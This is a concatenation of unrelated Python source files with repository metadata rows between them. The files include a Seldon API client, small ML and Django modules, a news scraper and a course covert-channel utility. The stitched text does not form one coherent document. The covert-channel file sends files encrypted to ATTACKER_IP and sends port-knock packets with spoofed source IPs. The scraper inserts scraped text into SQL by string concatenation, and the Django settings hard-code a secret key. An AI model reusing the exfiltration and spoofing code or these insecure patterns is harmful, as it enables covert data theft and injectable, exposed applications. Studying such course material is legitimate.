_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_batch_job(self, name, namespace, job_name, **kwargs): # noqa: E501
"""get_deployment_batch_job # noqa: E501
Get details on the seldondeployment's batch job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_batch_job(name, namespace, job_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str job_name: JobName identifies a job name (required)
:return: BatchJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_deployment_batch_job_with_http_info(name, namespace, job_name, **kwargs) # noqa: E501
else:
(data) = self.get_deployment_batch_job_with_http_info(name, namespace, job_name, **kwargs) # noqa: E501
return data
def get_deployment_batch_job_with_http_info(self, name, namespace, job_name, **kwargs): # noqa: E501
"""get_deployment_batch_job # noqa: E501
Get details on the seldondeployment's batch job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_batch_job_with_http_info(name, namespace, job_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str job_name: JobName identifies a job name (required)
:return: BatchJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'job_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_batch_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_deployment_batch_job`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `get_deployment_batch_job`") # noqa: E501
# verify the required parameter 'job_name' is set
if ('job_name' not in params or
params['job_name'] is None):
raise ValueError("Missing the required parameter `job_name` when calling `get_deployment_batch_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
if 'job_name' in params:
path_params['jobName'] = params['job_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}/batchjobs/{jobName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_seldon_deployment_batch_jobs(self, name, namespace, **kwargs): # noqa: E501
"""list_seldon_deployment_batch_jobs # noqa: E501
Read the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_seldon_deployment_batch_jobs(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str limit: Limit of items returned in one response
:param str page: Requested page
:return: BatchDescriptionList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_seldon_deployment_batch_jobs_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.list_seldon_deployment_batch_jobs_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def list_seldon_deployment_batch_jobs_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""list_seldon_deployment_batch_jobs # noqa: E501
Read the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_seldon_deployment_batch_jobs_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str limit: Limit of items returned in one response
:param str page: Requested page
:return: BatchDescriptionList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'limit', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_seldon_deployment_batch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `list_seldon_deployment_batch_jobs`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_seldon_deployment_batch_jobs`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'page' in params:
query_params.append(('Page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}/batchjobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchDescriptionList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"agm@seldon.io"
] |
agm@seldon.io
|
4c12d6c896c4460ce3cf13fc5e489758157c9092
|
4904acd900496b4883c2f5b4aa6b45d1ef6654c0
|
/graphgallery/nn/layers/tensorflow/__init__.py
|
27608f8342dd120c8fa2199d9a62271dd3402705
|
[
"MIT"
] |
permissive
|
blindSpoter01/GraphGallery
|
aee039edd759be9272d123463b0ad73a57e561c7
|
e41caeb32a07da95364f15b85cad527a67763255
|
refs/heads/master
| 2023-06-17T11:42:27.169751
| 2021-07-15T03:07:39
| 2021-07-15T03:07:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 152
|
py
|
from .conv import *
from .top_k import Top_k_features
from .dropout import *
from .misc import SparseConversion, Scale, Sample, Gather, Laplacian, Mask
|
[
"cnljt@outlook.com"
] |
cnljt@outlook.com
|
0b3c762d62a61ea50b5248ea260cc0b2539f9c05
|
1049843fc2931f8c0d997be409a0bdaab0610c3c
|
/shop/contrib/stock/models.py
|
e3ae13f28c6ce0036fdb8a944a6050abb2e97dfe
|
[] |
no_license
|
Optixdesigns/django-shop
|
212b0a8a7c561dfadf8d306d0141588316d94f2d
|
a58028a3fe638c8c6ba3b37e139290657ffc0d13
|
refs/heads/master
| 2020-04-06T05:47:54.101765
| 2012-10-31T14:44:07
| 2012-10-31T14:44:07
| 4,168,793
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
class VariantStockLevelMixin(models.Model):
"""
Mixin for configurable Variant models
"""
sku = models.CharField(_('SKU'), max_length=128, db_index=True, unique=True,
help_text=_('ID of the product variant used'
' internally in the shop.'))
stock_level = models.DecimalField(_("stock level"), max_digits=10,
decimal_places=4, default=0)
class Meta:
abstract = True
|
[
"sjoerd@optixdesigns.com"
] |
sjoerd@optixdesigns.com
|
3605eda012bbbdc82374e58cba08581a97dc808f
|
6d59b155bcf3a61ff677d8ca103215af20ba40cd
|
/python/05/05Animal_Class.py
|
5c17da84c29d38fbfc3acd81ba08db49037633a7
|
[] |
no_license
|
lilgaage/lilgaage_scripts
|
1c82ba869e637a5971215b2eb084f3b2e9a4b954
|
9108f821c634ffae05423083b9330281f3ae5a57
|
refs/heads/main
| 2023-08-20T13:01:48.670270
| 2021-10-21T09:16:15
| 2021-10-21T09:16:15
| 419,627,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,009
|
py
|
class Animal:
def __init__(self,name,age,gender,weight):
#非私有属性
self.name = name
self.age = age
self.gender = gender
#私有属性 不能被继承,也不能在类的外部被调用
self.__weight = weight
#私有方法 不能被继承,也不能在类的外部被调用
def __eat(self,food):
print("{}不爱吃肉,爱吃{}".format(self.name,food))
#非私有方法
def run(self):
print("{}吃完饭了喜欢跑来跑去".format(self.name))
def shower(self):
print("{}喜欢吃饭前去洗澡".format(self.name))
def introduce(self):
msg = "{}是一个{}孩子,小可爱今年才{}岁,但是体重居然已经{}斤了。"
print(msg.format(self.name,self.gender,self.age,self.__weight))
self.__eat("鬼鬼") #调用私有化方法
#狗类,子类继承父类,获得父类所有非私有的属性和方法
class Dog(Animal):
def drink(self):
print("{}喜欢喝牛奶".format(self.name))
#子类重写了父类的同名方法
def run(self):
print("{}吃完饭了就在那躺着,根本就不动".format(self.name))
class Cat(Animal):
def __init__(self,name,age,gender,weight):
super(Cat,self).__init__(name,age,gender,weight) #super关键字重写父类构造方法
self.name = name
print("我是{}".format(self.name))
def getName(self):
return "Cat"+self.name
def drink(self):
print("{}喜欢喝酸奶".format(self.name))
a1 = Animal("瑰丝",18,"女",40)
a1.run()
# a1.__eat("鬼鬼") #私有方法不能在类的外部被调用
# print(a1.__weight) #私有属性不能在类的外部被调用
d1 = Dog("小瑰",3,"男",20)
#子类调用父类非私有方法
d1.introduce()
d1.drink()
#子类调用方法时,如果已经重写了父类同名方法,则调用自己的
d1.run()
c1 = Cat("娃琳可",2,"女",18)
c1.introduce()
|
[
"noreply@github.com"
] |
lilgaage.noreply@github.com
|
87589d298b01d75146ed1956e271d9ba5e9f5e0c
|
040c49dd116ad6ff69a61a60c9fc2dc3d17da6d0
|
/pdtry.py
|
c4d32dd9979ac9ebfeca0f12ae13657b280e1b42
|
[] |
no_license
|
raulsanika015/python
|
0dba12d62a32b7cbcd1c50c018a6ab4f56cf9472
|
cf2e73192e180efe3357cbc5477b9abe1469f818
|
refs/heads/master
| 2020-08-13T10:43:57.942184
| 2019-10-14T13:38:45
| 2019-10-14T13:38:45
| 214,956,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 970
|
py
|
'''
import pandas as pd
# reading csv file from url
data = pd.read_csv("book1.csv")
# creating short data of 5 rows
d = data.head()
# creating list with 5 values
list =[1000,2000,3000,4000,5000]
# adding list data
# creating new column
d["Added values"]= d["SALARY"].add(list)
# display
print(d)
print(d["SALARY"].prod())
print(d["SALARY"].sum())
'''
# importing pandas module
import pandas as pd
# reading csv file from url
data = pd.read_csv("Book1.csv")
# dropping null value columns to avoid errors
data.dropna(inplace = True)
# storing dtype before converting
before = data.dtypes
# converting dtypes using astype
data["SALARY"]= data["SALARY"].astype(int)
data["CONTACT"]= data["CONTACT"].astype(str)
# storing dtype after converting
after = data.dtypes
# printing to compare
print("BEFORE CONVERSION\n", before, "\n")
print("AFTER CONVERSION\n", after, "\n")
|
[
"noreply@github.com"
] |
raulsanika015.noreply@github.com
|
a56f9ca0f4e70237db43a581038292f080b3a26d
|
41d020c1155337889b2a55d03dd842dabee4118a
|
/sls/completion/complete.py
|
a028fecd5f409d68d2e210fbd04f7d932c120579
|
[
"Apache-2.0"
] |
permissive
|
wilzbach/storyscript-sls
|
417aeeb51d5e1f5a19d9401e2a7196104a7c723a
|
d71d74a53852ebae54bdaab341678b04f2775411
|
refs/heads/master
| 2020-04-30T12:46:08.848392
| 2020-01-28T14:19:20
| 2020-01-28T14:19:20
| 176,835,051
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,902
|
py
|
from sls.logging import logger
import sls.sentry as sentry
from .ast import ASTAnalyzer
from .cache import ContextCache
from .context import CompletionContext
log = logger(__name__)
class Completion:
"""
Builds a completion list
"""
def __init__(self, context_cache, plugins):
self.context_cache = context_cache
self.plugins = plugins
def gather_completion(self, context):
for plugin in self.plugins:
ret = plugin.complete(context)
# serialize all items
for item in ret:
# check whether serialization is necessary
if isinstance(item, dict):
yield item
else:
yield item.to_completion(context)
def complete(self, ws, doc, pos):
""""
See the LSP Protocol on Completion [1].
[1] https://microsoft.github.io/language-server-protocol/specification#textDocument_completion
""" # noqa
# Initialize context
context = CompletionContext(ws=ws, doc=doc, pos=pos)
log.info("Word on cursor: %s", context.word)
# Update context caches
self.context_cache.update(context)
try:
items = self.gather_completion(context)
items = sorted(items, key=lambda x: x["label"])
except BaseException as e:
sentry.handle_exception(e)
items = []
return {
# Indicates that the list it not complete.
# Further typing should result in recomputing this list.
"isIncomplete": False,
"items": items,
}
@classmethod
def full(cls, service_registry):
context_cache = ContextCache(service_registry.hub)
return cls(
context_cache=context_cache,
plugins=[ASTAnalyzer(service_registry, context_cache),],
)
|
[
"seb@wilzba.ch"
] |
seb@wilzba.ch
|
3da4401d31604b9dbd226ce90a6be1b1f2237f26
|
2da0be64bb7a608b984b5ef6022f29821662078b
|
/additional/compare_numpy_fftw.py
|
bac377db1b367a8571d5a55341fc0c70044c4d0c
|
[] |
no_license
|
ahelm/fftw-examples
|
08766a34ff1a9b2f651595285abae13859e0e9e5
|
42243147adf5db0d9868f06aacd6a36807b0e541
|
refs/heads/master
| 2020-03-31T13:48:44.478366
| 2018-10-23T18:16:12
| 2018-10-23T18:16:12
| 152,269,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 757
|
py
|
# run first FFTW_simple - to store the data
import numpy as np
import matplotlib.pyplot as plt
in_arr = np.fromfile("fftw_simple_in.raw", dtype=np.double)
in_arr = np.reshape(in_arr, (512, 2))
np_in = in_arr[:, 0] + 1.0j * in_arr[:, 1]
plt.figure()
plt.title("input arr")
plt.plot(in_arr[:, 0], "o", mfc="none")
plt.plot(in_arr[:, 1], "o", mfc="none")
plt.plot(np.real(np_in), "x")
plt.plot(np.imag(np_in), "x")
out_arr = np.fromfile("fftw_simple_out.raw", dtype=np.double)
out_arr = np.reshape(out_arr, (512, 2))
np_out = np.fft.fft(np_in)
plt.figure()
plt.title("|output arr - numpy output|")
plt.plot(out_arr[:, 0], "o", mfc="none")
plt.plot(out_arr[:, 1], "o", mfc="none")
plt.plot(np.real(np_out), "x")
plt.plot(np.imag(np_out), "x")
plt.show()
|
[
"anton.helm@tecnico.ulisboa.pt"
] |
anton.helm@tecnico.ulisboa.pt
|
11ce75d4bd2254ce4e7db74f5a9d3ba44e7599a7
|
8a96bfce1186a3464aa84e46febd9a8d6d94207b
|
/utils.py
|
ffd381a762cc7f91208b7115a9fbe2ec1d83e8bf
|
[] |
no_license
|
Nishan-Vivek/BCIT-COMP8505-Final-Covert-Communication-App
|
70983336ec8dc2acf0d4618a05b6f901ac071003
|
d9acafba9df0cc28cbb662fa2d203e295589782b
|
refs/heads/master
| 2022-03-27T08:38:28.091349
| 2020-01-13T01:35:21
| 2020-01-13T01:35:21
| 112,429,756
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
from crypto import *
from time import sleep
from scapy.all import *
from scapy.layers.inet import IP, UDP
def send_file(file_path):
print('Sending File...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, FILE_TRANSFER_PORT))
file = open(file_path, 'rb')
s.send(encrypt(os.path.split(file_path)[1]))
data = file.read(4096)
while 1:
s.send(encrypt(data))
data = file.read(4096)
if not data:
break
s.close()
def knock():
print('Knock1')
packet = IP(dst=ATTACKER_IP, src=knock_1) / UDP(sport=int(VICTIM_PORT), dport=int(ATTACKER_PORT)) / "Knock"
send(packet)
sleep(1.5)
print('Knock2')
packet = IP(dst=ATTACKER_IP, src=knock_2) / UDP(sport=int(VICTIM_PORT), dport=int(ATTACKER_PORT)) / "Knock"
send(packet)
sleep(1.5)
print('Knock3')
packet = IP(dst=ATTACKER_IP, src=knock_3) / UDP(sport=int(VICTIM_PORT), dport=int(ATTACKER_PORT)) / "Knock"
send(packet)
sleep(1.5)
def listen_for_file():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = socket.gethostname()
print (host)
s.bind((host, FILE_TRANSFER_PORT))
s.listen(5)
conn, addr = s.accept()
print (addr)
data = decrypt(conn.recv(4096))
print data
f = open(data, 'wb')
while 1:
data = decrypt(conn.recv(4096))
if not data:
break
print data
f.write(data)
conn.close()
f.close()
s.close()
|
[
"adamharrison2012@gmail.com"
] |
adamharrison2012@gmail.com
|
d7e40bfc0631bb952596d974e34621b6bd016d0d
|
4c6dd374b4b9ac6b6d8dae55399f754bdf2e5dd1
|
/scripts/motion_estimator.py
|
a3c38541a1e175c3a5458f1c42650fdd9f1d642e
|
[] |
no_license
|
SubMishMar/golfcart_utilities
|
4f3bc92e795f5005a6b012e83f263da1bd84ad14
|
2f12a8211078dfaa90ba049c0f3c8846d52e0ef0
|
refs/heads/master
| 2020-04-05T10:17:46.071806
| 2019-01-14T19:10:18
| 2019-01-14T19:10:18
| 156,793,386
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 776
|
py
|
#!/usr/bin/env python
# license removed for brevity
import rospy
import math
import numpy as np
from nav_msgs.msg import Odometry
class integrator:
def __init__(self):
self.odom_sub = rospy.Subscriber('/Odom', Odometry, self.odomCallback)
self.predicted_x = 0
self.predicted_y = 0
self.predicted_z = 0
self.firstTime = True
def odomCallback(self, data):
if !self.firstRun:
vel_x = data.twist.twist.linear.x
vel_y = data.twist.twist.linear.y
vel_z = data.twist.twist.linear.z
self.predicted_x = self.predicted_x + vel_x*dt;
self.predicted_y = self.predicted_y + vel_y*dt;
self.predicted_z = self.predicted_z + vel_z*dt;
if __name__ == '__main__':
rospy.init_node('motion_estimator', anonymous=True)
odometry = integrator()
rospy.spin()
|
[
"subodheenitr@gmail.com"
] |
subodheenitr@gmail.com
|
df0e854af66e4b08013f10764efbf283604e605a
|
cf5f24e5a32f8cafe90d4253d727b1c0457da6a4
|
/algorithm/boj_2003.py
|
512b9e6a296d25c4afedb26eb17489dad3e85a78
|
[] |
no_license
|
seoljeongwoo/learn
|
537659ca942875f6846646c2e21e1e9f2e5b811e
|
5b423e475c8f2bc47cb6dee09b8961d83ab08568
|
refs/heads/main
| 2023-05-04T18:07:27.592058
| 2021-05-05T17:32:50
| 2021-05-05T17:32:50
| 324,725,000
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
import sys
input = sys.stdin.readline
n,m = map(int,input().split())
a = list(map(int,input().split()))
left,right,s=0,0,0
ret = 0
while left < n and right <n :
if s == m: ret += 1
if s <=m :
s += a[right]
right += 1
else:
s -= a[left]
left += 1
while left < n:
if s == m: ret += 1
s -= a[left]
left += 1
print(ret)
|
[
"noreply@github.com"
] |
seoljeongwoo.noreply@github.com
|
ac023013317edfede1cf982dffd58bc1ae0dd1b4
|
d806039aacec6aa3719f41989bf3322a319abdd8
|
/PGGAN/utils.py
|
c20dc647c48646e8571b6ef20705f1ea4dd18dcb
|
[
"MIT"
] |
permissive
|
MingtaoGuo/DCGAN_WGAN_WGAN-GP_LSGAN_SNGAN_RSGAN_BEGAN_ACGAN_PGGAN_TensorFlow
|
7cbce46b78f6e254c729df351bc127740a060e84
|
af6a012a9e9ddff29195b12988f3e66091696ff0
|
refs/heads/master
| 2022-09-18T13:04:49.324624
| 2022-08-20T01:47:15
| 2022-08-20T01:47:15
| 139,560,429
| 173
| 39
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,041
|
py
|
import scipy.io as sio
import numpy as np
def read_data(path):
for i in range(1, 6):
if i == 1:
data_mat = sio.loadmat(path + "data_batch_" + str(i) + ".mat")
data = np.transpose(np.reshape(data_mat["data"], [10000, 3, 32, 32]), [0, 2, 3, 1])
labels = data_mat["labels"]
else:
data_mat = sio.loadmat(path + "data_batch_" + str(i) + ".mat")
temp = np.transpose(np.reshape(data_mat["data"], [10000, 3, 32, 32]), [0, 2, 3, 1])
data = np.concatenate((temp, data), axis=0)
labels = np.concatenate((data_mat["labels"], labels), axis=0)
return data, labels
def get_batch(data, batchsize):
data_nums = data.shape[0]
rand_select = np.random.randint(0, data_nums, [batchsize])
batch = data[rand_select]
z = np.random.normal(0, 1, [batchsize, 512])
return batch, z
def read_face_data(path):
data = sio.loadmat(path)
return data["data"]
# a, b = read_data("./dataset/")
# a = 0
|
[
"noreply@github.com"
] |
MingtaoGuo.noreply@github.com
|
ef454ebddbb7786708aa91884bd25fe6756beed6
|
953bb4e6f2d72d714a895bbf3c50a7cbf64e6ab5
|
/accounts/migrations/0003_auto_20180604_2223.py
|
1c66e0e289befbb20448852a43768efe97039666
|
[] |
no_license
|
yunielgarcia/Profile-Project
|
fbe12dba5bda0d027f2015c71a4c627c41af9537
|
42ccf3371b03b49d3f16e662f3fdcbf6db955532
|
refs/heads/master
| 2020-03-18T10:55:51.825028
| 2018-06-08T17:53:46
| 2018-06-08T17:53:46
| 134,641,008
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 576
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-06-04 22:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_auto_20180525_2158'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='bio',
field=models.TextField(validators=[django.core.validators.MinLengthValidator(10, 'Description must be at least 10 characters')]),
),
]
|
[
"garciayuni84@gmail.com"
] |
garciayuni84@gmail.com
|
90868a593f6afc79c41a0c22489435edcc8682a9
|
95f9d23dc2d931c447752754d1fae0c979f43591
|
/python_exam/zhuaqu/zhuaqu.py
|
cd63e5d306bfadd15b8be82f09bcb7a996238f1d
|
[] |
no_license
|
18801499823/first
|
a459067f8a00d88dcd484f93e2d6f2266ccd2b39
|
1a1beb2da75fa15fbcbc34f3ae405118ff4bceb3
|
refs/heads/master
| 2020-08-03T18:18:56.832889
| 2016-11-18T11:56:52
| 2016-11-18T11:56:52
| 73,539,600
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,607
|
py
|
#!F:\Python27\python.exe
# -*- coding: UTF-8 -*-
print
import urllib
import urllib2
import re
import MySQLdb
print
class News:
#init
def __init__(self):
self.url = "http://news.baidu.com/"
#convert div to ''
def tranTags(self, x):
pattern = re.compile('<div.*?</div>')
res = re.sub(pattern, '', x)
return res
#getPage
def getPage(self):
url = self.url
request = urllib2.Request(url)
response = urllib2.urlopen(request)
return response.read()
#get navCode
def getNavCode(self):
page = self.getPage()
pattern = re.compile('(<div id="menu".*?)<i class="slogan"></i>', re.S)
navCode = re.search(pattern, page)
return navCode.group(1)
#get nav
def getNav(self):
navCode = self.getNavCode()
pattern = re.compile('<a href="(http://.*?/).*?>(.*?)</a>', re.S)
itmes = re.findall(pattern, navCode)
return itmes
# 打开数据库连接
db = MySQLdb.connect("localhost","root","root","sql",charset="GBK")
# 使用cursor()方法获取操作游标
cursor = db.cursor()
news = News()
new=news.getNav()
for item in new:
print item[0],news.tranTags(item[1])
title = news.tranTags(item[1])
# SQL 插入语句
sql = "INSERT INTO news_data(nav_title,url)VALUES('"+title+"','"+item[0]+"')"
try:
# 执行sql语句
cursor.execute(sql)
# 提交到数据库执行
db.commit()
except:
# Rollback in case there is any error
db.rollback()
# 关闭数据库连接
db.close()
|
[
"you@example.com"
] |
you@example.com
|
f648d9d8a853fc774588882252c25034dc6e3331
|
5b4cca08e9a9de82baf8021b5aaa39efe96f619b
|
/TensorFlow/read_data_fast.py
|
730d80b46d49a7d9bbf378afea47209b5f9dc33d
|
[] |
no_license
|
pkq2006/DL_project
|
dcfa6854fc84ba37fe6640a85010f40f63bdbf5c
|
874faee5e42f2ebd94702c31f0732a5edf1542b0
|
refs/heads/master
| 2021-01-11T22:25:41.926588
| 2017-01-14T10:05:04
| 2017-01-14T10:05:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
import os
import numpy as np
import numpy
import PIL.Image
from sklearn import preprocessing
import json
import math
from scipy.ndimage import filters
global train_data, train_label, val_data, val_label, data_1, data_0
train_data, train_label, val_data, val_label, data_1, data_0 = [], [], [], [], [], []
ppp = -1
n_channels = 1
train_data_size = 0
val_data_size = 0
data_length = 40
eps = 1e-8
def readFile_processed(filename, ind, type):
global ppp, n_channels
data_, num1, num0, num1_, num0_ = [], [], [], [], []
fopen = open(filename, 'r')
for eachLine in fopen:
num0.append(float(eachLine))
fopen.close()
num0 = np.array(num0)
res_data = np.zeros((data_length, n_channels))
for i in xrange(n_channels):
res_data[:, i] = num0
data_0.append(res_data)
def eachFile1(filepath, type_):
global train_label, val_label
global train_data_size, val_data_size
pathDir = os.listdir(filepath)
_ = ''
for allDir in pathDir:
#child = os.path.join('%s/%s' % (filepath, allDir))
child = os.path.join('%s/%s' % (filepath, allDir))
ind = allDir.index('.')
#if(allDir[ind + 1 : len(allDir)] == 'engy'):
if(allDir[ind + 1 : len(allDir)] == 'f1'):
label_ = int(allDir[ind - 1]) - 1
if(type_ == 'mydata/train'):
train_data_size += 1
train_label.append(label_)
if(type_ == 'mydata/test_new'):
val_data_size += 1
val_label.append(label_)
pron = allDir[0:ind - 1]
#readFile(child, ind + len(filepath)+ 1, type_)
print child
readFile_processed(child, ind + len(filepath)+ 1, type_)
def eachFile0(filepath):
pathDir = os.listdir(filepath)
for allDir in pathDir:
child = os.path.join('./%s/%s' % (filepath, allDir))
eachFile1(child, filepath)
def read_data_():
global train_data, train_label, val_data, val_label, data_1, data_0
#eachFile0('train')
#eachFile0('test_new')
eachFile0('mydata/train')
eachFile0('mydata/test_new')
data_0 = np.array(data_0)
tmp_ = np.zeros([len(train_label), 4])
tmp_[np.arange(len(train_label)), train_label] = 1
train_label = tmp_
tmp_ = np.zeros([len(val_label), 4])
tmp_[np.arange(len(val_label)), val_label] = 1
val_label = tmp_
def next_train_batch(_size, iter_):
global train_data, train_label, n_channels
max_iter = train_data_size / _size
iter = iter_ % max_iter
return data_0[iter*_size : (iter + 1)*_size, :].reshape((_size, data_0.shape[1], n_channels)), train_label[iter*_size : (iter + 1)*_size]
def get_val():
global val_data, val_label, n_channels
return data_0[train_data_size : train_data_size+val_data_size,:].reshape((val_data_size, data_0.shape[1], n_channels)), val_label
|
[
"noreply@github.com"
] |
pkq2006.noreply@github.com
|
378e52f260636b95fcd858a293904a9f16a67b9c
|
6663e28f46da2e0922030bacbd44db11b670de7b
|
/api_core/settings.py
|
6a535032f464eadbfc50ca395c3f77e0d38dc317
|
[] |
no_license
|
LingzFY/mycode-rodin
|
e414746480dce703e450debfb1aaf1b9eb84b74d
|
a0e9b78f9c2e753cf5700642a1465e314467dd9a
|
refs/heads/main
| 2023-07-16T22:18:43.883445
| 2021-09-01T09:30:56
| 2021-09-01T09:30:56
| 402,000,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,668
|
py
|
"""
Django settings for api_core project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-(5-pi)m1(qi5_h%wwp7pqx9m9ovmyh8x)egq@&!io0obl25co@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Django REST Framework
'rest_framework',
# Roda Indonesia Application
'rodin.apps.RodinConfig',
# Cors
'corsheaders',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# CORS
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
ROOT_URLCONF = 'api_core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
